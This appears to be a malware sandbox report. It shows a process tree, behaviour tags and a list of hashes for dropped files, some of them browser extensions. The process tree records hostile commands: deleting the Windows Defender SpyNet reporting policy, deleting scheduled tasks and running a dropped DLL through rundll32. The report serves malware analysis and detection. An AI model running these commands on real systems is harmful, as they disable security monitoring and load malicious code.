C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2252
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"2⤵PID:2648
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\gxdfbuyn\NkPjBSV.dll",#1 /JQsite_idXyH 3851181⤵PID:3988
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\gxdfbuyn\NkPjBSV.dll",#1 /JQsite_idXyH 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3544 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"3⤵PID:4772
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f4fa1bf0897301ec528383dbedacc14c
SHA1b9086efa6b7786c53cd881e66f12c202df8da322
SHA256f15c1ae8840b424026a378df54222c74bea4ad5996fa6fa2263e0d2d4214fdc4
SHA5121aeb1b19e3f8dab8f2632bb849e19414303b8b5e70dd64089d498f0977a135b817cf977e3a4c4e6acf20df76ec62f342e180dbc37412c3c4de32cb4d910206a1
-
Filesize
2KB
MD50e9daca9540d7b754f940816fb812c33
SHA13049d43ecb4f60febceaf905ef438c48cef72667
SHA256ad3b57cf8ce197af89ca23f3a9cac7fac1a13040b50a1baefa71b317da49cd89
SHA512289cb00f66523707221cbdc1216e4506ed9d75218ea03257c41b00e18e05c60c156ac22371e6b4953980056ddb603dd170f0f3941b540ae9d2971c6cae92cea5
-
Filesize
2KB
MD5b32e8ea3fc0323cdbeb9f59b46d65489
SHA1118a9595d5171fb3879000dbe2d8703f95eae450
SHA25686d2e38cb0231bd0bbe579d5e80b8a49918fd4bffbfc77c433b693c0f86cf6a1
SHA5124aa562d645a91fd692ba6a8463dc3cd7ca20bbf486c58ac7bf12644265275f945d6b3896a8a270a88719943d6e90dd4c8eeb2d4eb675de6fc93ce16e392ae1c1
-
Filesize
2KB
MD5fce3f44f5677bcfab805c75fd178461e
SHA1f2736f47fe33bee880f3bf1e84f800baf198f75f
SHA2567a442a7276d5a92d0e801ba7156afa70d3a1f267746d0fa1b62fc9021723747e
SHA512318287b63195c09bf0f4de33fef66bc0d8890e3011951022434cb8ba828db0df9e2c4a96ea92735fac0aac8f078f1b3b67eb9c21ed3504340b7993626ee0aee2
-
Filesize
2.0MB
MD58d3da8f7eb27ef607d2bcee0504fb4aa
SHA1367ea894e08a603de70cf368a90bcbbe816cf709
SHA2560771bf084ad0b5708cfe217fbefc775505e8566221f414c92c1d3c382b8feab2
SHA5127404f77e0659c33d86b2ce3fe2253847c76e17322a8a66d6f54bf665253c9b29fd8f1b6734f6e731842dc0cc0aa53a912edf0f1eca5665c028256758e49bb042
-
Filesize
2KB
MD58bcf16d39c18920008da668a38a602e6
SHA152d510d4bc97b3b7e9b3148f1e2849099048c5aa
SHA2566d762bcfac44e939c58166e323db14ebdde87db7ed0edc65fe63305d77189496
SHA5126ffb4b285e380085b5a3aa38071a4cc7d5de83bb1b3958c1b4bb7f0e2c2087d81da7a7690b8d11ebf3c58c2ca95d26b42bf5a037f4171680de91ac1f59dd94c1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD57bf2a304504d2352e363cf479860d86b
SHA14f22f83015d67cbc37ba2b983225037ba3762438
SHA2560f4988f21de3c050a39478cab9e4d8279dbe87ad2797f3e4b6d15045963dfabb
SHA512d55f31bc06eee3502f63ae4083e6f88b033fb7b4c4ecabb8d1b5fa42df60db7dd5f9f259e32c2d9fd04b58ff1b988f056c308829b2675cbc5e19db8d4dc0bb64
-
Filesize
34KB
MD5e39efb096030f98301d6f410a185deb2
SHA11c27179040105d7d7f1850ba5f81552d7a8a6945
SHA25659db8c4843bdd5262a82f0d82e8cf9b6caf95c714050e7dd0891440a154881e3
SHA512540b5b0c05aee7658719428320508239aa220b3dc5f825232e7ae715374baee182b396a9db96de2958af4bff947040b27aa9efd678ff870d55a97540019d0ee6
-
Filesize
2KB
MD588dc70c361a22feac57b031dd9c1f02f
SHA1a9b4732260c2a323750022a73480f229ce25d46d
SHA25643244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA51219c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
6.9MB
MD5ea99e72c1ac89aa9cc14178b1c46d50d
SHA160b896781f40e89106d0c76abd11c5b5d0832943
SHA2569cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28
SHA51203693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5fd32f426f911fc34af1e4491e6270fe1
SHA1a057c666b04b3335e46ca1b4dbbf53d4db739743
SHA256b63b8bedb939fe820d18bf24f7dcb1dffdd6c0a94a07bd3e56e421a5ec41610d
SHA5123ed361f0dfbfc67f3bdc0ad5e105fb1d17c3127fe25bc74359ce1bae97a05868654362f0da68f1f8c02269aa52ff6140a086f1dd1bdc695c8e83d09d9e2b9a73
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD55b74da6778ccaa0e1ca4ae7484775943
SHA10a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA51220b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD55842dbf59e51aa9cc6f3634e55edf298
SHA1f5071496f016da26a2eaa8b598478689ea95efdc
SHA2568142922b90dbf92f40777c9597e9bb144c06503d54bd0de5f3c05176f2f3bd48
SHA512c9bbfa7ef903e7cf8463ff6ff1e3f2af25b7a5c44852188ec99ebb7a581c307296f9fb0fb5c84e412a7e5bf352b25277439561e325514eb7eaed827edb8014b2
-
Filesize
6.3MB
MD5fdcc0ef7b4cb82035c51f55cfece6cf1
SHA1ee1d2e870309f5ba05e0216d3ea909c1ae9d8ee4
SHA2567c3415f11576e09a0910da101422f044162b11607aa670452843436925d8c26b
SHA51205d9e81255dfbd647198b4f9d13c420f3f8d56a235ebbec301d7006597bec72b4bfa0dc7e8e1f76de4e9d16b5e95a9f5c585bbdb4ce5fe98cade2872dffccf3a
-
Filesize
6KB
MD5af5a6b277700c3d5f2b18476dc79bf88
SHA1cd73d9b216467ce5ef9c4ed007f21506bdcda9ce
SHA2563bd8efb7779a1f95f313b9e441b865476c5ba63acfdebf0b6647413451b58ec9
SHA51227649baa11485fb0f10638344c934df823c1546abb396f12ee1932bc03c663d6186c3b7720d6cbb7d3afe7b2765713e896d67cca02d736fd65142b4a1b30d611
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732